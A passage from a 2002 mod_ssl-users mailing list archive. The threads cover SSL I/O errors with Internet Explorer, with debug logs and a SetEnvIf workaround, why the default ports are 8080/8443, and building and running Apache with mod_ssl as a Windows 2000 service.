| 0100: f2 30 c9 df be 15 79 80-de f2 33 8c 4f ba fc 2f  .0....y...3.O../ |
| 0110: 30 96 d9 f4 ac 39 f5 8a-43 f6 0a 16 71 db ee 5d  0....9..C...q..] |
| 0120: 31 a7 31 d6 95 99 c0 b8-83 90 4d 09 da 65 91 77  1.1.......M..e.w |
| 0130: f6 aa ea 0c a2 c5 2a a0-a4 e7 95 52 85 53 4a b0  ......*....R.SJ. |
| 0140: 3f 27 b1 f3 90 7d cd 6f-ca ec de 49 4e c8 9f 6e  ?'...}.o...IN..n |
| 0150: ee 84 ae 9e a1 a0 ab 26-88 f8 e3 ee 12 e0 68 d3  .......&......h. |
| 0160: 27 a0 33 13 8e be 4d 45-8d 96 14 2b f9 3f 76 8b  '.3...ME...+.?v. |
| 0170: 8e 1b 06 bb 02 54 8a 29-99 e8 29 bd 68 13 41 c0  .....T.)..).h.A. |
| 0180: 49 0c e0 81 a9 19 45 3d-00 96 21 4c d6 08 74 43  I.....E=..!L..tC |
| 0190: ca 1d 3d 87 cd 1d 1a 5a-c1 33 cc 03 a6 4a 82 fd  ..=....Z.3...J.. |
| 01a0: a4 43 13 54 8a 94 45 eb-d1 5d 9e 14 b8 3f 6b 27  .C.T..E..]...?k' |
| 01b0: 67 74 c4 53 ba 55 8e ff-01 3c d1 af f2 d5 16 31  gt.S.U...<.....1 |
| 01c0: b8 69 e8 d5 ac d3 a1 3f-18 4a 51 68 d0 d8 8e 99  .i.....?.JQh.... |
| 01d0: 60 ab f9 24 12 18 d0 de-2c 0c 50 9f 91 d8 01 9b  `..$....,.P..... |
| 01e0: 8e 4a f8 c7 12 ba 30 f9-11 96 0f 35 4f a7 26 84  .J....0....5O.&. |
| 01f0: a6 c7 90 ff b4 17 ff 1f-be 71 b9 85 61 c3 60 85  .........q..a.`. |
| 0200: 7b 20 e9 31 d9 2e b5 d6-0b eb 01 4a d8 4e 22 24  { .1.......J.N"$ |
| 0210: 59 09 49 6b 1a 5d f3 23-80 4e b6 4a 7f 46 6d 8a  Y.Ik.].#.N.J.Fm. |
| 0220: 8f 85 2b ef 4b cf db a6-89 52 72 c8 2b 74 ac 79  ..+.K....Rr.+t.y |
| 0230: 8f 5e 4a 9b 72 ea fc a4-f6 85 9b b4 6a 16 c3 d8  .^J.r.......j... |
| 0240: 1f 07 b8 aa ce 15 33 cb-7c fe de e3 9f 02 15 5c  ......3.|......\ |
| 0250: 91 3a bc 1b a7 79 f1 5e-eb b9 63 12 9d 29 21 5c  .:...y.^..c..)!\ |
| 0260: bb 3d 88 58 c9 56 19 41-2b 0d 88 09 df 2d 40 e7  .=.X.V.A+....-@. |
| 0270: ef e9 23 4b 93 d9 b0 f7-bb e7 c6 f4 df 93 db 96  ..#K............ |
| 0280: 2a 00 cc ee da aa 4e dd-6c d4 36 d3 ec d4 ac c1  *.....N.l.6..... |
| 0290: fa ba cb 06 71 60 6f 1b-11 ea 90 e7 d0 89 38 53  ....q`o.......8S |
| 02a0: dc 7c 36 0e a1 ee 43 21-bb 23 f0 50 12 41 db a5  .|6...C!.#.P.A.. |
| 02b0: e2 d5 86 1d 89 0b 33 e2-6f 60 4f 17 52 9a c3 d2  ......3.o`O.R... |
| 02c0: e2 3d 80 c9 a7 b2 a4 ba-40 39 60 86 a4 e6 b5 e3  .=......@9`..... |
| 02d0: 08 2a 38 54 51 8d 80 a7-f0 8c f5 c6 b1 1d 5f e6  .*8TQ........._. |
| 02e0: d8 ad 33 d1 c3 8a 8d c9-ed 35 d6 51 fd 7f a2 5a  ..3......5.Q...Z |
| 02f0: a8 5b d3 1f 84 94 31 16-0a d9 6a 7c 82 2b c7 32  .[....1...j|.+.2 |
| 0300: 9b 9c 1b 9b 4a 01 f1 ce-c9 36 aa 04 91 b9 12 77  ....J....6.....w |
| 0310: 0d 64 77 07 6e c3 ee 02-e2 c5 11 73 a8 66 5c 92  .dw.n......s.f\. |
| 0320: de 41 1c fa 5e 57 b3 d0-f0 92 e5 2f 4a           .A..^W...../J    |
+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [info]  Subsequent (No.2) HTTPS request received
for child 9 (server card.omv.com:443)
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 2045B828]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [info]  Connection to child 1 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 204557C8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [info]  Connection to child 8 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: write 360/360 bytes to
BIO#202FF4B8 [mem: 2045DFD8] (BIO dump follows)
+-------------------------------------------------------------------------+
|

We are using PL/SQL Server Pages (PSP) containing javascript and html code.
Running the application without SSL does NOT cause errors!
Are there any settings in the httpd.conf file for using IE and PSPs?

Thanx in advance for your help!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 21:00:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03588; Mon, 10 Jun 2002 20:59:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server.cartmanager.net id UAA03549; Mon, 10 Jun 2002 20:58:29 +0200 (MET DST)
Received: from Jason (dhcp120.cartmanager.net [207.173.85.120])
	(authenticated)
	by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g5AImUQ26095
	for ; Mon, 10 Jun 2002 12:48:30 -0600
Message-ID: <02d601c210b0$cd218610$7855adcf@Jason>
From: "Jason" 
To: 
References: <200206101424.QAA15580@opensource.ee.ethz.ch>
Subject: Re: [BugDB] I/O Error when using https (PR#715)
Date: Mon, 10 Jun 2002 12:54:41 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you tried adding this in your httpd.conf
SetEnvIf User-Agent ".*MSIE.*"  "nokeepalive" "ssl-unclean-shutdown" "downgrade-1.0" "force-response-1.0"

It may prevent (but not correct) your problem with IE

----- Original Message ----- 
From: 
To: 
Cc: 
Sent: Monday, June 10, 2002 8:24 AM
Subject: [BugDB] I/O Error when using https (PR#715)


> Full_Name: Stephan PAVEK, Mag.
> Version: 2.8.1
> OS: Win NT 40
> Submission from: (NULL) (193.83.101.90)
> 
> 
> We are running a web-application using SSL. The environment is as follows: IAS
> 1.0.2.2.2 (ORACLE) using Apache (v 1.3.19) and open_ssl (v 0.9.5a) on an
> AIX-Machine, ORACLE-DB v. 8.1.7.3.
> Using IE Explore > 5.01 (we didn't test older versions) we get I/O errors in the
> log-file (ssl_engine_log). We got the following log-entries. These error result
> in empty pages on the Browser (
> 
> +-------------------------------------------------------------------------+
> [10/Jun/2002 15:43:06 35008] [debug] OpenSSL: read 813/18437 bytes from
> BIO#202FF4B8 [mem: 204557C8] (BIO dump follows)
> +-------------------------------------------------------------------------+
> | 0000: 17 03 01 03 28 8a f8 91-2e 50 78 b0 02 4e 23 68  ....(....Px..N#h |
> | 0010: 53 95 8f 7d d4 55 24 ab-e4 66 88 59 6f 78 05 d5  S..}.U$..f.Yox.. |
> | 0020: 50 01 e2 96 ac 8c 8f 08-5e 68 12 9b 27 68 22 75  P.......^h..'h"u |
> | 0030: 24 80 cc 2a 13 82 eb 4b-01 82 93 78 45 c3 66 1c  $..*...K...xE.f. |
> | 0040: 22 fa 3f a1 9a 78 1c a7-ce 66 98 ab f0 4b e9 38  ".?..x...f...K.8 |
> | 0050: 88 03 ce 16 12 33 6a 74-e2 8a df 5e d5 3f 98 58  .....3jt...^.?.X |
> | 0060: 80 d5 5a ba ab bf 2e 3e-53 7c 14 60 4e b8 a0 03  ..Z....>S|.`N... |
> | 0070: 9d 62 fc 5f 1d fc ca c7-5e ac 53 b7 46 e5 6f 8c  .b._....^.S.F.o. |
> | 0080: d1 87 36 8b b4 73 5f 24-d8 63 f9 a5 a3 dd 28 38  ..6..s_$.c....(8 |
> | 0090: 75 54 0c c7 28 7b c1 ba-fe c9 21 d6 dd ce 8d ed  uT..({....!..... |
> | 00a0: fb 6c ab cd 76 de dc 64-b4 9a 02 ea 2f f4 c1 4a  .l..v..d..../..J |
> | 00b0: a0 64 88 af b3 b8 cb 18-42 9f cb 38 8f 37 a0 43  .d......B..8.7.C |
> | 00c0: 43 f6 eb bc 6f 4e bd 7c-63 fc 11 4a f4 a3 1e 56  C...oN.|c..J...V |
> | 00d0: 2d 54 2e fc 32 da 93 77-de 0a 74 6f be 73 06 2d  -T..2..w..to.s.- |
> | 00e0: 9d 9a 8f 9f b6 ff 80 33-24 c0 af 47 d2 37 af e6  .......3$..G.7.. |
> | 00f0: 8c 7d a6 89 0a 1f 65 ca-d8 12 c6 7a e7 0b 30 74  .}....e....z..0t |
> | 0100: f2 30 c9 df be 15 79 80-de f2 33 8c 4f ba fc 2f  .0....y...3.O../ |
> | 0110: 30 96 d9 f4 ac 39 f5 8a-43 f6 0a 16 71 db ee 5d  0....9..C...q..] |
> | 0120: 31 a7 31 d6 95 99 c0 b8-83 90 4d 09 da 65 91 77  1.1.......M..e.w |
> | 0130: f6 aa ea 0c a2 c5 2a a0-a4 e7 95 52 85 53 4a b0  ......*....R.SJ. |
> | 0140: 3f 27 b1 f3 90 7d cd 6f-ca ec de 49 4e c8 9f 6e  ?'...}.o...IN..n |
> | 0150: ee 84 ae 9e a1 a0 ab 26-88 f8 e3 ee 12 e0 68 d3  .......&......h. |
> | 0160: 27 a0 33 13 8e be 4d 45-8d 96 14 2b f9 3f 76 8b  '.3...ME...+.?v. |
> | 0170: 8e 1b 06 bb 02 54 8a 29-99 e8 29 bd 68 13 41 c0  .....T.)..).h.A. |
> | 0180: 49 0c e0 81 a9 19 45 3d-00 96 21 4c d6 08 74 43  I.....E=..!L..tC |
> | 0190: ca 1d 3d 87 cd 1d 1a 5a-c1 33 cc 03 a6 4a 82 fd  ..=....Z.3...J.. |
> | 01a0: a4 43 13 54 8a 94 45 eb-d1 5d 9e 14 b8 3f 6b 27  .C.T..E..]...?k' |
> | 01b0: 67 74 c4 53 ba 55 8e ff-01 3c d1 af f2 d5 16 31  gt.S.U...<.....1 |
> | 01c0: b8 69 e8 d5 ac d3 a1 3f-18 4a 51 68 d0 d8 8e 99  .i.....?.JQh.... |
> | 01d0: 60 ab f9 24 12 18 d0 de-2c 0c 50 9f 91 d8 01 9b  `..$....,.P..... |
> | 01e0: 8e 4a f8 c7 12 ba 30 f9-11 96 0f 35 4f a7 26 84  .J....0....5O.&. |
> | 01f0: a6 c7 90 ff b4 17 ff 1f-be 71 b9 85 61 c3 60 85  .........q..a.`. |
> | 0200: 7b 20 e9 31 d9 2e b5 d6-0b eb 01 4a d8 4e 22 24  { .1.......J.N"$ |
> | 0210: 59 09 49 6b 1a 5d f3 23-80 4e b6 4a 7f 46 6d 8a  Y.Ik.].#.N.J.Fm. |
> | 0220: 8f 85 2b ef 4b cf db a6-89 52 72 c8 2b 74 ac 79  ..+.K....Rr.+t.y |
> | 0230: 8f 5e 4a 9b 72 ea fc a4-f6 85 9b b4 6a 16 c3 d8  .^J.r.......j... |
> | 0240: 1f 07 b8 aa ce 15 33 cb-7c fe de e3 9f 02 15 5c  ......3.|......\ |
> | 0250: 91 3a bc 1b a7 79 f1 5e-eb b9 63 12 9d 29 21 5c  .:...y.^..c..)!\ |
> | 0260: bb 3d 88 58 c9 56 19 41-2b 0d 88 09 df 2d 40 e7  .=.X.V.A+....-@. |
> | 0270: ef e9 23 4b 93 d9 b0 f7-bb e7 c6 f4 df 93 db 96  ..#K............ |
> | 0280: 2a 00 cc ee da aa 4e dd-6c d4 36 d3 ec d4 ac c1  *.....N.l.6..... |
> | 0290: fa ba cb 06 71 60 6f 1b-11 ea 90 e7 d0 89 38 53  ....q`o.......8S |
> | 02a0: dc 7c 36 0e a1 ee 43 21-bb 23 f0 50 12 41 db a5  .|6...C!.#.P.A.. |
> | 02b0: e2 d5 86 1d 89 0b 33 e2-6f 60 4f 17 52 9a c3 d2  ......3.o`O.R... |
> | 02c0: e2 3d 80 c9 a7 b2 a4 ba-40 39 60 86 a4 e6 b5 e3  .=......@9`..... |
> | 02d0: 08 2a 38 54 51 8d 80 a7-f0 8c f5 c6 b1 1d 5f e6  .*8TQ........._. |
> | 02e0: d8 ad 33 d1 c3 8a 8d c9-ed 35 d6 51 fd 7f a2 5a  ..3......5.Q...Z |
> | 02f0: a8 5b d3 1f 84 94 31 16-0a d9 6a 7c 82 2b c7 32  .[....1...j|.+.2 |
> | 0300: 9b 9c 1b 9b 4a 01 f1 ce-c9 36 aa 04 91 b9 12 77  ....J....6.....w |
> | 0310: 0d 64 77 07 6e c3 ee 02-e2 c5 11 73 a8 66 5c 92  .dw.n......s.f\. |
> | 0320: de 41 1c fa 5e 57 b3 d0-f0 92 e5 2f 4a           .A..^W...../J    |
> +-------------------------------------------------------------------------+
> [10/Jun/2002 15:43:06 35008] [info]  Subsequent (No.2) HTTPS request received
> for child 9 (server card.omv.com:443)
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 18437 bytes expected to
> read on BIO#202FF4B8 [mem: 2045B828]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [info]  Connection to child 1 closed with standard
> shutdown (server card.omv.com:443, client 10.2.140.73)
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 18437 bytes expected to
> read on BIO#202FF4B8 [mem: 204557C8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [info]  Connection to child 8 closed with standard
> shutdown (server card.omv.com:443, client 10.2.140.73)
> [10/Jun/2002 15:43:06 35008] [debug] OpenSSL: write 360/360 bytes to
> BIO#202FF4B8 [mem: 2045DFD8] (BIO dump follows)
> +-------------------------------------------------------------------------+
> |
> 
> We are using PL/SQL Server Pages (PSP) containing javascript and html code.
> Running the application without SSL does NOT cause errors!
> Are there any settings in the httpd.conf file for using IE and PSPs?
> 
> Thanx in advance for your help!
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 21:04:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA03883; Mon, 10 Jun 2002 21:03:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id VAA03830; Mon, 10 Jun 2002 21:02:37 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 279A3C690E
	for ; Mon, 10 Jun 2002 15:02:31 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5AJ2Ura006875
	for ; Mon, 10 Jun 2002 15:02:30 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id PAA31197; Mon, 10 Jun 2002 15:02:30 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Testing with a dummy certificate...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 10 Jun 2002 15:02:30 -0400
Message-Id: <1023735750.1515.70.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I guess that makes sense.  This box we're putting it on already has
Tomcat and Inktomi's search engine fighting for 8080 and the surrounding
ports...  Not that they're any of them are difficult to change, but it
presented an interesting configuration glitch when I missed that second
port statement in the config.

On Mon, 2002-06-10 at 12:06, Geoff Thorpe wrote:
> Hi there,
> 
> On 10 Jun 2002, Sean M Alderman wrote:
> 
> > Opps...Nevermind, I just found that I had missed changing one line in
> > the conf/httpd.conf to change the port number from 8443 to 443.
> >
> > Is there are a reason why the config defaults to ports 8080 and 8443
> > instead of 80 and 443?
> 
> You can only start services on ports below 1024 if you are root. At least
> it's that way on respectable systems. :-) The default to 8080 and 8443
> assumes that, like everything else (default index.html(s), dummy certs),
> it should install some kind of template installation for you to test with
> and change rather than trying to configure anything production-like. It
> also reduces the chance that it conflicts with any system-wide running
> web-server upon installation.
> 
> Cheers,
> Geoff
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 06:59:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA02994; Tue, 11 Jun 2002 06:58:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rwcrmhc52.attbi.com id GAA02978; Tue, 11 Jun 2002 06:58:02 +0200 (MET DST)
Received: from bohr ([12.241.5.8]) by rwcrmhc52.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020611045755.SVKM2751.rwcrmhc52.attbi.com@bohr>
          for ; Tue, 11 Jun 2002 04:57:55 +0000
Message-ID: <026f01c21105$a95a6ee0$6401a8c0@bohr>
From: "Phil Smiley" 
To: 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Tue, 11 Jun 2002 00:05:52 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_026C_01C210DB.BFC869E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Phil Smiley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_026C_01C210DB.BFC869E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I've successfully compiled Apacche 2.0.36 and openssl as this thread =
describes.  I'm encountering problems building modssl though.  When I =
try to use NMAKE /f "mod_ssl.mak" CFG=3D"mod_ssl - Win32 Release", i get =
the following:
        link.exe @C:\DOCUME~1\ADMINI~1.000\LOCALS~1\Temp\nma02752.   =
Creating library .\Release\libapr.lib and object .\Release\libapr.exp    =
    cd "..\..\modules\ssl"        tempfile.batThe system cannot find the =
file specified.Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.cThe =
system cannot find the file specified.Could Not Find =
C:\httpd-2.0.36\modules\ssl\y.tab.hNMAKE : fatal error U1077: =
'tempfile.bat' : return code '0x1'Stop.
I didn't find these files anywhere in the apache or openssl directories.

When I used VC++, I get:
Linking...   Creating library Debug/mod_ssl.lib and object =
Debug/mod_ssl.expssl_expr_scan.obj : error LNK2001: unresolved external =
symbol _ap_pstrdupDebug/mod_ssl.so : fatal error LNK1120: 1 unresolved =
externalsError executing link.exe.
mod_ssl.so - 2 error(s), 0 warning(s)
I'm sure its something obvious that I've overlooked.  Does anyone have =
any suggestions?

Thanks; Phil

Thanks everyone, we now have everything working fine.

A quick howto for beginners (who perhaps experience what we have
experienced):

If you want win2k + mod-ssl, don't trust the apache HOWTO at
http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
be fine for those who don't need ssl (and those people can simply use
the supplied binaries) but they are wrong if you need ssl.

Firstly, don't use the perl examples given on apache.org to prepare and
compile openssl, use the instructions in INSTALL.W32 that comes with the
openSSL source.

We eventually found that with visual C++ 6 we could compile apache
without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
moved the mod-ssl.so binary to the modules folder in the apache
installation.

And that's it, except you need to know how to start Apache in "ssl
mode".

from the console in the apache\bin use

>apache -D SSL

to install apache to run as a service with SSL

>apache -i -D SSL

Hope this helps someone out there, and thanks to everyone who helped us!

John.





----- Original Message -----
From: "Mark Chew" 
To: 
Sent: Monday, June 10, 2002 7:11 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k =3D Easy Money


: Assuming the win2k service for Apache is created
: (else create one using sc command),
: try configure the Apache service properties like this :
:
: Path to executable:
: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
:
: Startup type:
: Automatic
:
:
:
: Regards,
: Mark
:
:
: >From: "John" 
: >Reply-To: modssl-users@modssl.org
: >To: 
: >Subject: Re: 2.0.36 + mod-ssl + Win2k =3D Easy Money
: >Date: Mon, 10 Jun 2002 17:20:20 +1200
: >
: >We have discovered that if we start Apache from the console with
: > >apache -D SSL on our windows server, then we have ssl support...
: >Please, someone, how do we get ssl support running as a service?
: >
: >It seems we have wasted a couple of days, simply to find this out!
: >
: >John.
: >
: >
: >
: >
:
>______________________________________________________________________
: >Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
: >User Support Mailing List
modssl-users@modssl.org
: >Automated List Manager
majordomo@modssl.org
:
:
:
:
: _________________________________________________________________
: Chat with friends online, try MSN Messenger: http://messenger.msn.com
:
: ______________________________________________________________________
: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
: User Support Mailing List                      modssl-users@modssl.org
: Automated List Manager                            majordomo@modssl.org
:

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------=_NextPart_000_026C_01C210DB.BFC869E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I've successfully compiled Apacche =
2.0.36 and openssl as this thread describes.  I'm encountering problems =
building modssl though.  When I try to use NMAKE /f "mod_ssl.mak" =
CFG=3D"mod_ssl - Win32 Release", i get the =
following:
        link.exe =
@C:\DOCUME~1\ADMINI~1.000\LOCALS~1\Temp\nma02752.
   =
Creating library .\Release\libapr.lib and object =
.\Release\libapr.exp
        cd =
"..\..\modules\ssl"
        =
tempfile.bat
The system cannot find the file specified.
Could Not =
Find C:\httpd-2.0.36\modules\ssl\y.tab.c
The system cannot find the =
file specified.
Could Not Find =
C:\httpd-2.0.36\modules\ssl\y.tab.h
NMAKE : fatal error U1077: =
'tempfile.bat' : return code '0x1'
Stop.
I didn't find these files anywhere in the apache =
or openssl directories.
 
When I used =
VC++, I get:
Linking...
   Creating =
library Debug/mod_ssl.lib and object =
Debug/mod_ssl.exp
ssl_expr_scan.obj : error LNK2001: unresolved =
external symbol _ap_pstrdup
Debug/mod_ssl.so : fatal error LNK1120: 1 =
unresolved externals
Error executing link.exe.
mod_ssl.so - =
2 error(s), 0 warning(s)
I'm sure its something obvious that =
I've overlooked.  Does anyone have any =
suggestions?
 
Thanks; Phil
 
Thanks everyone, we now have everything working fine.

A quick howto for beginners (who perhaps experience what we have
experienced):

If you want win2k + mod-ssl, don't trust the apache HOWTO at
http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
be fine for those who don't need ssl (and those people can simply use
the supplied binaries) but they are wrong if you need ssl.

Firstly, don't use the perl examples given on apache.org to prepare and
compile openssl, use the instructions in INSTALL.W32 that comes with the
openSSL source.

We eventually found that with visual C++ 6 we could compile apache
without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
moved the mod-ssl.so binary to the modules folder in the apache
installation.

And that's it, except you need to know how to start Apache in "ssl
mode".

from the console in the apache\bin use

>apache -D SSL

to install apache to run as a service with SSL

>apache -i -D SSL

Hope this helps someone out there, and thanks to everyone who helped us!

John.





----- Original Message -----
From: "Mark Chew" <mark__chew@hotmail.com>
To: <modssl-users@modssl.org>
Sent: Monday, June 10, 2002 7:11 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k =3D Easy Money


: Assuming the win2k service for Apache is created
: (else create one using sc command),
: try configure the Apache service properties like this :
:
: Path to executable:
: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
:
: Startup type:
: Automatic
:
:
:
: Regards,
: Mark
:
:
: >From: "John" <john@aboutogo.com>
: >Reply-To: modssl-users@modssl.org
: >To: <modssl-users@modssl.org>
: >Subject: Re: 2.0.36 + mod-ssl + Win2k =3D Easy Money
: >Date: Mon, 10 Jun 2002 17:20:20 +1200
: >
: >We have discovered that if we start Apache from the console with
: > >apache -D SSL on our windows server, then we have ssl =
support...
: >Please, someone, how do we get ssl support running as a service?
: >
: >It seems we have wasted a couple of days, simply to find this out!
: >
: >John.
: >
: >
: >
: >
:
>_____________________________________________________________________=
_
: >Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
: >User Support Mailing List
modssl-users@modssl.org
: >Automated List Manager
majordomo@modssl.org
:
:
:
:
: _________________________________________________________________
: Chat with friends online, try MSN Messenger: http://messenger.msn.com
:
: ______________________________________________________________________
: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
: User Support Mailing List                      modssl-users@modssl.org
: Automated List Manager                            majordomo@modssl.org
:

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------=_NextPart_000_026C_01C210DB.BFC869E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 07:05:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03500; Tue, 11 Jun 2002 07:04:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA03473; Tue, 11 Jun 2002 07:03:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6F9464CE790; Tue, 11 Jun 2002 07:03:35 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DA2092896D; Tue, 11 Jun 2002 07:00:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
